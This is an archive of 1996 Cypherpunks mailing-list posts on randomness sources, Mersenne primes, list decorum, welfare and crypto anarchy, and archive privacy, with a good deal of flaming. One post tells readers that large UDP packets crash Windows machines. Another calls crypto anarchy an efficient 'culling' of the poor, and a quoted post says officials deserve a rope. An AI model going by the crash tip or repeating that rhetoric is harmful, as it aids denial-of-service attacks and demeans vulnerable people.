Likewise, feeding the FM antennas with "special hiss" is implausible in the
extreme. Again, the attackers don't know antenna responses, atmospheric and
room geometry variations, etc. Even if the FM hiss were to be somewhat
biased, the LSBs would have a fair amount of entropy....collecting and
distilling this entropy would still be trivial.

Yes, this is all obvious stuff. But it keeps coming up. Not even the NSA
has the super powers to modulate the FM noise spectrum in a cost-effective
way.

Having said this, Johnson noise makes a superior noise source, if a
physical source is desired.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Javier Rivera <zeen@caribe.net>
Date: Mon, 2 Dec 1996 20:08:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <32A3A7C9.58C6@caribe.net>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe cypherpunks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Mon, 2 Dec 1996 16:27:19 -0800 (PST)
To: Paul Foley <mycroft@actrix.gen.nz>
Subject: Re: A quick discussion of Mersenne Numbers
In-Reply-To: <Pine.LNX.3.94.961202203917.4458C-100000@random.sp.org>
Message-ID: <Pine.LNX.3.94.961203002247.1380A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 2 Dec 1996, The Deviant wrote:

> On Mon, 2 Dec 1996, Paul Foley wrote:
> 
> > On Sun, 1 Dec 1996 14:10:13 -0500, Scottauge@aol.com wrote:
> >
> >    A mercenne number is of the type:
> >
> >    M(p) = 2**p -1 results in a prime when p is a prime.
> >
> > *Occasionally* results in a prime when p is prime.  (A Mersenne number
> > is any number of that form, prime or composite.  It so happens that if
> > M(p) is prime, p is prime)
> >
> >    Hopefully this will lead the way to see the pattern of prime
> >    numbers and being able to compute prime numbers in a far more
> >    efficient manner (after all a function that when given a prime
> >    number results in a prime number would be quite a kicker now
> >    wouldn't it!)
> >
> > That's easy: f(x) = x
> >
> >    The other Mersenne primes include:
> >
> >    2,3,5,7,13,17,19,31,127,61,89, and 107.
> >
> > 2, 5, 13, 17, 19, 61, 89 and 107 are not Mersenne numbers :-|
> >
> > The first few Mersenne primes are:
> > 3, 7, 31, 127, 8191, 131071, 524287, 2147483647
> 
> True.. but 1 is. 2^1-1=1
> 
> 
>  --Deviant
>    PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39
> 
> Try `stty 0' -- it works much better.

Please excuse me for writing such idiocy.  I was very tired at the time.

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

Insufficient facts always invite danger.
                -- Spock, "Space Seed", stardate 3141.9


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMqNy9jCdEh3oIPAVAQHxzwf5ATGxOj0sJuAn/YjgPm4bpjDZRk89UEph
CMT+MNTzj82+GsREavEISfWzND+IKXqCB5wnSW4Jy9pAdschNH4LbWoFRUz4BmnR
Yr9y9tBpiLizhbwbi011IDTVKobQ0m8ujpzVGkFCqz4HkIJ0+G2F8SGx0lPFJGqM
4PY88eSJwsEDAS406U5jZbtth6SSHER3qaLToqWntdn823fP7lIVpcWu0/4lZtkX
WEFinEcI0D1bR7PjVpWDm6YQX1i3laCTJKXgJQA1r5tOSk42XqNyX07rt2dXC892
+Egy0jFYe4T28eCMvJBUU7Gc5jF4ZWHk3GrCQwzlH8jWZfuUeEhC6Q==
=RwA0
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 3 Dec 1996 01:02:09 -0800 (PST)
To: LOGOS <logos@c2.net>
Subject: Re: Logos here
In-Reply-To: <Pine.BSF.3.91.961202220347.2616A-100000@blacklodge.c2.net>
Message-ID: <32A3EC7E.2EF8@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


LOGOS wrote:
> Sovereign collegues,
>      I am Logos. I have adopted this pseudonym to conceal my
> 'true name'. I want the ideas which I shall be espousing
> to stand or fall on their own merits and not on the basis
> of biases that my name, sex, ethnicity, etc. might otherwise
> elicit. I hope my contributions to this list will be seen as
> positive by most list members.
>      I intend to limit my postings to only two meta-topics:
> decorum and logic. In other words, the way we speak to each
> other and the quality of our argumentation.

[decorum snipped for space]

> Logic
> The average reader of this list has sufficient
> education and intelligent to understand the most informal
> logical falacies. Yet one sees such falacies committed here
> with disapointing regularity. I will post definitions of the
> most common falacies and will use examples found on this
> list as illustrations. If we are to be persuasive among
> ourselves and with others, we need to be rigorous in our
> thought processes.

Sounds like a heck of a good idea, if:

1. You can ID the bad logic with a high percent of success (90+ ?).

2. You can comment/reply for all members fairly, but if limited by the
   large number of postings (and fallacies ?), give priority to ???

As far as Congress expelling members, are you saying that the Senate
and/or H.O.R. can permanently eliminate a person elected by the people?
Has this ever been tested?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 3 Dec 1996 01:21:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Culling the proles with crypto anarchy
In-Reply-To: <1.5.4.32.19961127210637.006e33c4@popd.ix.netcom.com>
Message-ID: <v03007800aec99ea1af30@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:06 PM -0500 11/27/96, Clay Olbon II wrote:
>At 12:46 PM 11/27/96 -0800, Dave Kinchlea <security@kinch.ark.com> wrote:

>>I am not in a position to argue with you, I simply don't have the facts.
>>My question is, do You? can you cite where this figure came from, it
>>sounds like Republican rhetoric to me. Of course, I will point out, that
>>minimum wage is simply not enough to feed a family. It is (or at least
>>it should be) reserved for single folks just starting out.
>
>Can't give you the exact date, but it was an article in our local paper (The
>Detroit News).  The $10 figure is not exact, as the actual number varies
>from state to state, I remember that number as being about average.

I can confirm the gist of Clay's point: I saw a table listing "effective
hourly welfare pay" for the 50 states and D.C. This was in the "San Jose
Mercury News," at least 8-10 months ago (and presumably elsewhere, as it
was a major story). I used it in one of my articles, and gave the reference
then (sorry, not handy, and my own welfare rate does not pay me enough to
spend hours sifting through past articles for something so minor, an old
cite, that is).

The interesting thing was that New York had an effective welfare pay rate
of $14 an hour, and New York City was more than that (due to higher
benefits and higher taxes dragging down the income of actual workers). By
"effective" the idea is to add up direct welfare benefits, food stamps, WIC
payments, AFDC payments, and then correct for the various tax treatments
(e.g., some or all of these benefits are untaxed). A worker would have to
be earning $14 an hour, or about $30 K a year, to get the same amount of
effective take home pay that a welfare recipient with two children receives.

Given that the worker has to get up at, say, 6 a.m., get on a bus or train
or in a car to get to work, put up with hassles, and, basically, _work_,
the welfare alternative looks pretty good. Which is of course the problem
so-called democratic societies are having--increasing numbers of layabouts,
slackers, and leeches.

The "list relevance" of this is this: crypto provides means of hiding
income, or arbitraging income sources and regulations, and of basically
undermining the welfare state.

Many of my tradtionally libertarian friends dispute my beliefs, but I
believe income disparities will grow with time, not decrease. The top tier
of fiction writers, for example, can easily earn several million dollars or
more a year, while the second tier sees their stuff remaindered and the
third tier never makes it into print. Ditto for programmers and others.
With the "force multiplication" seen in modern economies, there are vast
riches to be had for the best few percent in any field, and much less for
the drones. Those with no skills to hire out face the prospect of zero
income, with not even there physical labor in demand.

I basically see no hope for the bottom 30% of the population, and less and
less hope for the bottom 70%.

Fortunately, my ethical system is such that I see this as just the nature
of things, evolution in action. Crypto anarchy will do a more efficient job
of culling than many imagine.

--Tim May



Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 3 Dec 1996 01:29:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Logos here
In-Reply-To: <Pine.BSF.3.91.961202220347.2616A-100000@blacklodge.c2.net>
Message-ID: <v03007801aec9a32cc060@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:53 AM -0600 12/3/96, Igor Chudov @ home wrote:
>[Cc'ed to Bill Palmer himself. Bill, use 'Group Reply' button if you
>want your replies to be seen by all participants.]
>
>Dear LOGOS,
>
>I suggest contacting Bill Palmer, wilhelp@ix.netcom.com. You will find
>that Bill's and your opinions on many issues are very close.
>
>Best regards to both of you,
>
>	- Igor.
>
>LOGOS wrote:
>>
>> Sovereign collegues,
...

And quoting the entire article by "Logos" without even saying what it is
this mysterious Bill Palmer believes in yet another reason the list is
filling up with junk. If the message was to "LOGOS," his c2 address would
get it to him. If the message was to the rest of us, why so cryptic about
Bill Palmer? In any case, the Logos articles needed to be trimmed out.

I'm not picking on Igor...I just wish people would learn to summarize and
excerpt, and not just forward on entire quoted articles. "Your text editor
is your friend."

Someone once pointed out to me that quoting _at most_ a half screenful of
stuff is best: quoting a screenful or more before comments begin is almost
a guarantee that many people will hit the "delete" key. I try to follow
this rule of thumb, and limit my quotes accordingly.


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 3 Dec 1996 00:16:54 -0800 (PST)
To: logos@c2.net (LOGOS)
Subject: Re: Logos here
In-Reply-To: <Pine.BSF.3.91.961202220347.2616A-100000@blacklodge.c2.net>
Message-ID: <199612030753.BAA02432@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


[Cc'ed to Bill Palmer himself. Bill, use 'Group Reply' button if you
want your replies to be seen by all participants.]

Dear LOGOS,

I suggest contacting Bill Palmer, wilhelp@ix.netcom.com. You will find
that Bill's and your opinions on many issues are very close.

Best regards to both of you,

	- Igor.

LOGOS wrote:
> 
> Sovereign collegues,
> 
>      I am Logos. I have adopted this pseudonym to conceal my
> 'true name'. I want the ideas which I shall be espousing
> to stand or fall on their own merits and not on the basis
> of biases that my name, sex, ethnicity, etc. might otherwise
> elicit. I hope my contributions to this list will be seen as
> positive by most list members.
>      I intend to limit my postings to only two meta-topics:
> decorum and logic. In other words, the way we speak to each
> other and the quality of our argumentation.
> 
> Decorum
> 
>      From time to time, I will 'call' posters on their
> intemperate use of rude or provocative language. I believe
> Cypherpunks should be a market place of ideas, not a forum
> for egos and insults.
>      The two houses of the American congress have adopted
> rules of decorum. Members may be censored or expelled for
> personal attacks and verbal abuse of other members. This
> was mandated for a very practical reason. It was realized
> that insults, profanity, 'fighting words', etc. could get so
> out of hand that they could interfer with the legitimate
> work of the congress. While some might say that in the case
> of the congress, this would be a good thing, I believe in
> the case of Cypherpunks, it is a bad thing.
>      I, therefore, call upon each Cypherpunk list members to
> personally adopt such a code of conduct for themselves.  If
> Democrats can refer to Representative Gingrich as 'my
> esteemed collegue' and Republicans can talk about the
> 'honorable' Ted Kennedy, I see no reason that we cannot
> treat Tim May and Dimitry Vilus with similar respect and
> courtesy.  What is at stake is far more important than egos.
> Cypherpunks defeated Clipper, but of late they have only
> defeated themselves.
> 
> Logic
> 
>      The average reader of this list has sufficient
> education and intelligent to understand the most informal
> logical falacies. Yet one sees such falacies committed here
> with disapointing regularity. I will post definitions of the
> most common falacies and will use examples found on this
> list as illustrations. If we are to be persuasive among
> ourselves and with others, we need to be rigorous in our
> thought processes.
> 
> I would be honored to hear your thoughts on this post.
> 
> Logos out.
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Mon, 2 Dec 1996 19:43:02 -0800 (PST)
To: "Bruce M." <bkmarsh@feist.com>
Subject: Re: IP address
In-Reply-To: <Pine.BSI.3.91.961202185629.4826A-100000@wichita.fn.net>
Message-ID: <Pine.LNX.3.94.961203034021.3667A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 2 Dec 1996, Bruce M. wrote:

> On Mon, 2 Dec 1996 ichudov@algebra.com wrote:
> 
> > > >What is the risk of publishing your dynamic IP address to a web page while you are on line?  How vulnerable is someone just connected to the internet, w/o any server running? What attacks are feasable? --Internaut
> > > 
> > > Well, if you are running Win95 (all) or 3.1 (w/certain TCP/IP stacks) your
> > > machine can be locked up or rebooted at *any* time using just PING!
> > > 
> > 
> > Isn't is Unix that is actually vulnerable?
> 
>     I have never been able to cause more than a mild performance 
> degredation by pinging a Windows 95 machine with large packets.  When 
> testing the idea I kept increasing the packet size until the machine no 
> longer responded, but the machine still had TCP/IP capabilities (in terms 
> of transmitting data and forming connections).  Ping flooding is another 
> matter though.  You probably could cause a larger performance drop.
> 

try sending big udp packets instead of big tcp packets; this kills windows
faster.

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

Traveling through hyperspace isn't like dusting crops, boy.
                -- Han Solo


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMqOhizCdEh3oIPAVAQGmwQf8DFO8mdlkk2TQBTpmsYtGmjw5UsezqjkA
AayPyzks+6gcylQiqmOZkNb7LTAdClP3lVdz4nxBJYNUzYBSvYDlAJtRgFC+CR0u
NXTdr+FZVOjaqaQkFjyIipOCx51Ljsxzr6zXbKIOHTZI5FU20n/NZJaVYzluC9xm
VRu/DEXE54esI5QZIM77d8x5lltj15i88D5/Cq/ufb3xr0EBNK3FxklTgFIzxwuP
Bdedcf8Vb1EfI958RxAeZ/AQWFujlZSZPwQ6CScBfJiGb4CNv5zNcbiNP0vdpnl6
DgehGTXRNtD27pA2Y0gx9/AOQIiGGZ2RAmG94iJXn/iEecHQqunqpg==
=Tz+8
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Mon, 2 Dec 1996 19:53:11 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: DES/IDEA In Linux loopback devices...
Message-ID: <Pine.LNX.3.94.961203035114.3694A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Does anybody know where the archive for this kernel patch is?

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

"If you eliminate the impossible, whatever remains, however improbable,
must be true." -- Spock


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMqOj+zCdEh3oIPAVAQF50gf+OA4aDrXpFSTUcpeHRzJC0xIu+TsOi7NI
w0qWAK6V9c7olJLqzvUwPt1JkvsihSr8z12JUtGrRjuYUW+Zq4rueX1iwmPmt0EZ
HUTZ1Ky6j0L/Ewn5YDjL6QV++zZuLNCCqVXkMee0ezrwi4GwyMMB1cKfbsnkprzu
2oQyDcEJvFXmkEKFv+u54DDB9viOEyBfVJoEHZtzaFrVFtf/QqY9KEY8JuJC6s67
FK4i5ltS4vzCu2cL4EmmWyJDvhPycdOBksU+yrPci4vB1PFzlQJ9I+Vz8Pr/fY6m
BwLDu2Ptd9ZfOG51oSI4MaUxeD/Suxt9hPFVe5aU7xCMQ8f5UUbGtA==
=R2Xk
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Tunnicliffe" <Tunny@inference.com>
Date: Tue, 3 Dec 1996 06:54:04 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: Modulating the FM noise spectrum considered infeasible
Message-ID: <c=US%a=_%p=Inference%l=LANDRU-961203145204Z-12520@landru.novato.inference2.com>
MIME-Version: 1.0
Content-Type: text/plain


> [...]Having said this, Johnson noise makes a superior noise source,
> if a physical source is desired.
>
> --Tim May

Yours makes NOISE?  Impressive...

In this case, I guess entropy is preferable to atrophy, though.  :-)

Tunny
======================================================================
 James A. Tunnicliffe   | WWWeb: http://www.inference.com/~tunny
 Inference Corporation  | PGP Fingerprint:   CA 23 E2 F3 AC 2D 0C 77
 tunny@Inference.com    |                    36 07 D9 33 3D 32 53 9C
======================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 3 Dec 1996 06:58:27 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: denial of service and government rights
In-Reply-To: <Pine.SUN.3.91.961202223742.24305G-100000@crl5.crl.com>
Message-ID: <32A43FF7.2089@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort wrote:
> On Mon, 2 Dec 1996, Dale Thorn wrote:
> > Normally, when someone doesn't know when to give up (you and
> > Sandy S. are two who come to mind), I just drop it...

> Wrong AGAIN.  I gave up on Dale a long time ago.  That's why *I*
> dropped it.

I think the above reply proves my point.  Thank you Sandy.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 3 Dec 1996 07:34:16 -0800 (PST)
To: Paul Foley <mycroft@actrix.gen.nz>
Subject: Re: [NOISE]-- [PHILOSOPHYPUNKS] Re: The House Rules At The Permanent Virtual Cypherpunks Party
In-Reply-To: <199612031405.DAA02486@mycroft.actrix.gen.nz>
Message-ID: <32A44861.3619@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Paul Foley wrote:
> On Mon, 02 Dec 1996 21:34:14 -0800, Dale Thorn wrote:
>    Bryce wrote:
>    > whatever letters you want; you don't have the right to demand
>    > that any particular thing be _done_ with those letters once
>    > they arrive, in the absence of some contract to the contrary.

>    In the interest of reducing the amount of argument, let's speak more
>    precisely:  I think people *do* have the right to demand such a thing,

> Do you indeed?  OK, I hereby demand that you set up a mailing list on
> your computer for discussion of "censorship" on cypherpunks.

I hear your demand, which you have a right to make, and I reject it,
which is my right. You proved my point, that you could make the demand,
and I further proved it, by saying no.  Is that clear enough?

[other similar drivel snipped]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack <jcate@501.yc.yu.edu>
Date: Tue, 3 Dec 1996 06:11:01 -0800 (PST)
To: varange@crl.com
Subject: Re: Phrack, where can i find it?
In-Reply-To: <Love@22777>
Message-ID: <Pine.LNX.3.95.961203090855.14440A-100000@501.yc.yu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Dec 1996, Troy Varange wrote:

> Tim Scanlon <tfs@adsl-122.cais.com> writing [  762] bytes in <$m2n21503-.9612012338.AA09683@adsl-122.cais.com> from nexp.crl.com!usenet73.supernews.com!news.good.net!news.good.net!www.nntp.primenet.com!nntp.primenet.com!feed1.news.erols.com!phase2.worldnet.att.net!uunet!in1.uu.net!204.171.44.51!scramble.lm.com!mail2news!toad.com!cypherpunks-errors said:
> 
> > > where can i find latest (and old) phrack issues?
> > > 
> > ftp.fc.net /pub/phrack has all the back issues, as well as the
> > current ones. 
> 
> 	Mid-1995 is about their latest issue.  Their older issues
> 	truely sucked with mucho false info.
> 

Phrack 49 has been out for a while. It's from November of this year.

-Jack





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Tue, 3 Dec 1996 06:36:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Speedbumps
Message-ID: <9611038496.AA849634495@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


Zona Research Inc.                     
Sun Wins China Internet Backbone Deal

Sun Microsystems announced it has been chosen by China Internet Corporation
(CIC) to provide equipment and technology for CIC's Internet/Intranet network
for China -- the China Wide Web (CWW). Pursuant to a nonbinding memorandum of
understanding, CIC intends to purchase $15 million of Sun servers and network
security and management products, as well as Java computing technology. Expected
to service 50 major Chinese cities, the CWW will enable companies within and
outside of China to search, exchange, and promote business information and
services.

The significance of this deal goes beyond its face value in dollars. 

* We believe the CWW will assume the characteristics of a national Intranet*, 

becoming an important vehicle for Chinese communications and commerce.  As a key
supplier of technology to CIC, Sun gains a high profile status within China,
which we believe gives Sun significant leverage on future Chinese
Internet/Intranet deals. Overall, this deal provides Sun with a major inroad to
the Chinese Internet market.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 3 Dec 1996 07:07:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Culling the proles with crypto anarchy
In-Reply-To: <v03007800aec99ea1af30@[207.167.93.63]>
Message-ID: <uL8cyD48w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:
> The interesting thing was that New York had an effective welfare pay rate
> of $14 an hour, and New York City was more than that (due to higher
> benefits and higher taxes dragging down the income of actual workers). By
> "effective" the idea is to add up direct welfare benefits, food stamps, WIC
> payments, AFDC payments, and then correct for the various tax treatments
> (e.g., some or all of these benefits are untaxed). A worker would have to
> be earning $14 an hour, or about $30 K a year, to get the same amount of
> effective take home pay that a welfare recipient with two children receives.

I wonder if the study took medical insurance into account? I used to pay $8K/
year for a pretty skimpy family medical insurance plan. (They cost so much
in NYC because of AIDS.) People on welfare get Medicaid.

> Given that the worker has to get up at, say, 6 a.m., get on a bus or train
> or in a car to get to work, put up with hassles, and, basically, _work_,
> the welfare alternative looks pretty good. Which is of course the problem
> so-called democratic societies are having--increasing numbers of layabouts,
> slackers, and leeches.

Can you blame people like Igor Chudov? I happen to think that I can obtain
more wordly goods by working hard; but if someone prefers to subsist on
my taxes, more power to them. If you don't like the present system, don't
blame the people who take advantage of it, change it.

Of course Tim May is incapable of doing anything to help bring about his
beloved "crypto anarchy" except whining.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 3 Dec 1996 07:07:25 -0800 (PST)
To: wilhelp@ix.netcom.com
Subject: Re: Logos here
In-Reply-To: <v03007801aec9a32cc060@[207.167.93.63]>
Message-ID: <BV8cyD49w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:
> At 1:53 AM -0600 12/3/96, Igor Chudov @ home wrote:
> >[Cc'ed to Bill Palmer himself. Bill, use 'Group Reply' button if you
> >want your replies to be seen by all participants.]
> >
> >Dear LOGOS,
> >
> >I suggest contacting Bill Palmer, wilhelp@ix.netcom.com. You will find
> >that Bill's and your opinions on many issues are very close.

I think Bill is head and shoulders above Logos.

> >Best regards to both of you,
> >
> >	- Igor.
> >
> >LOGOS wrote:
> >>
> >> Sovereign collegues,
> ...
>
> And quoting the entire article by "Logos" without even saying what it is
> this mysterious Bill Palmer believes in yet another reason the list is
> filling up with junk. If the message was to "LOGOS," his c2 address would
> get it to him. If the message was to the rest of us, why so cryptic about
> Bill Palmer? In any case, the Logos articles needed to be trimmed out.

Igor sure has better manners than Timmy, so whose cow should moo...

Anyways Bill Palmer is a really cool guy. Bill, if you care to comment
on issues of cryptoanarchy and content-based plug-pulling and are not
afraid to join a high-volume mailing list, please send this command
to majordomo@toad.com:        subscribe cypherpunks

Note that you can send contributions to cypherpunks@toad.com even if
you're not subscribed.

You can also cross-post anything you post to alt.flame to mail.cypherpunks.

Have fun - I'm looking forward to your contributions.

Thanks in advance,

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 3 Dec 1996 07:06:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Hurray! A good example of rational thinking ...
In-Reply-To: <sJaByD32w165w@bwalk.dm.com>
Message-ID: <sB9cyD50w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM) writes:

> Rich Graves <rcgraves@ix.netcom.com> writes:
> > But in general, cypherpunks seems to have improved remarkably over the
> > last couple weeks. I'd guess that the V-flames had the unintended
> > consequence of driving off the other ranters and ravers, because they
> > tend to lack the technical and thinking skills necessary for building
> > killfiles.
>
> Timmy May (fart) appears to have shut up, and that's a Good Thing.
>
> Good riddance to Timmy.

And the moment I said that, Timmy woke up and posted a pile of
non-crypto-related drivel again. Timmy is soooo predictable and
easy to manipulate, it's hardly even funny anymore.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 3 Dec 1996 08:17:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: PRIVACY: X-No-Archive and mail.cypherpunks
Message-ID: <199612031615.KAA03400@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Hi,

This is primarily addressed to the person who supports cypherpunks
mail-to-news gateway. If you know who such person is, please send
his/her address to me.

Dear gateway maintainer, 

Please modify your reposting program so that it does not remove the

		X-No-Archive: yes 

header line from email messages. This particular header line is an
indication to USENET search engines that the author of the message would
not like it to be stored in these engines. It preserves the author's
privacy and enforces the copyright protection.

I am opposed to seeing my articles showing up in DejaNews and other
search engines. All my emails and usenet postings have this header
line. However, when cypherpunks-to-newsgroup gateway reposts all
articles, it strips this header line. I believe it to be a mistake
and hope that it will be corrected.

Thank you.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 3 Dec 1996 10:19:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PRIVACY: X-No-Archive and mail.cypherpunks
In-Reply-To: <199612031615.KAA03400@manifold.algebra.com>
Message-ID: <v03007801aeca1ee533e0@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:15 AM -0600 12/3/96, Igor Chudov @ home wrote:

>This is primarily addressed to the person who supports cypherpunks
>mail-to-news gateway. If you know who such person is, please send
>his/her address to me.
....
>I am opposed to seeing my articles showing up in DejaNews and other
>search engines. All my emails and usenet postings have this header
>line. However, when cypherpunks-to-newsgroup gateway reposts all
>articles, it strips this header line. I believe it to be a mistake
>and hope that it will be corrected.

Igor raises an important point.

I believe he is misguided in his expectation that his public utterances in
a forum containing at least 1200 readers (and probably more, through
gateways, etc.) that he can limit uses of his posts. Any recipient of his
public utterances may choose to quote them in other articles, forward them
to friends, archive them on his own disks, etc.

(The interesting issue of whether making a file accessible to a search
engine spider, and hence making the material much more widely accessible,
is unresolved in the courts at this time. I was involved in a forum for
U.S. Copyright Office issues--a virtual electronic forum of law professors
and such--and I brought this issue up several times...with little interest,
I should add.)

"Archive policy arbitrage" is much like "cancellation policy arbitrage":
any site which honors "no archive" policies is likely to be in competition
with sites or search spiders which ignore "no archive" requests. If the
U.S. courts rule--someday--that a "no archive" tag is enforceable (how?),
then this'll just shift the sites and spiders to other jurisdictions.

In a free society it is impossible to control what people do with material
given to them. The best means of protecting one's writings is not to
distribute them.


--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Tue, 3 Dec 1996 09:37:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Counterproductive Dorothy Denning Flames
Message-ID: <199612031737.KAA02719@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain



At 10:10 AM 11/27/1996, Mike Duvos wrote:
>William H. Geiger III writes:
>
> > Dorthy Denning is a boot-licking fasicist!!!
>
> > William Reinsch is a lying bastard. Fucking politions!!
> > Fucking goverment!! They all deserve a long rope!!
>
>It is perhaps a point in Dr. Denning's favor that her most
>vitriolic detractors can spell neither "Dorothy" nor "fascist".
>
>I must admit that I am at a loss to understand the heat which
>Dorothy Denning generates on the Cypherpunks list, which seems to
>be second only to the heat generated by posting recipes for roast
>feline in rec.pets.cats.

I find it interesting that you see Willam H. Geiger as a spokesman for
the cypherpunks list.  Remember, the list is open to anyone who can
operate majordomo except one.

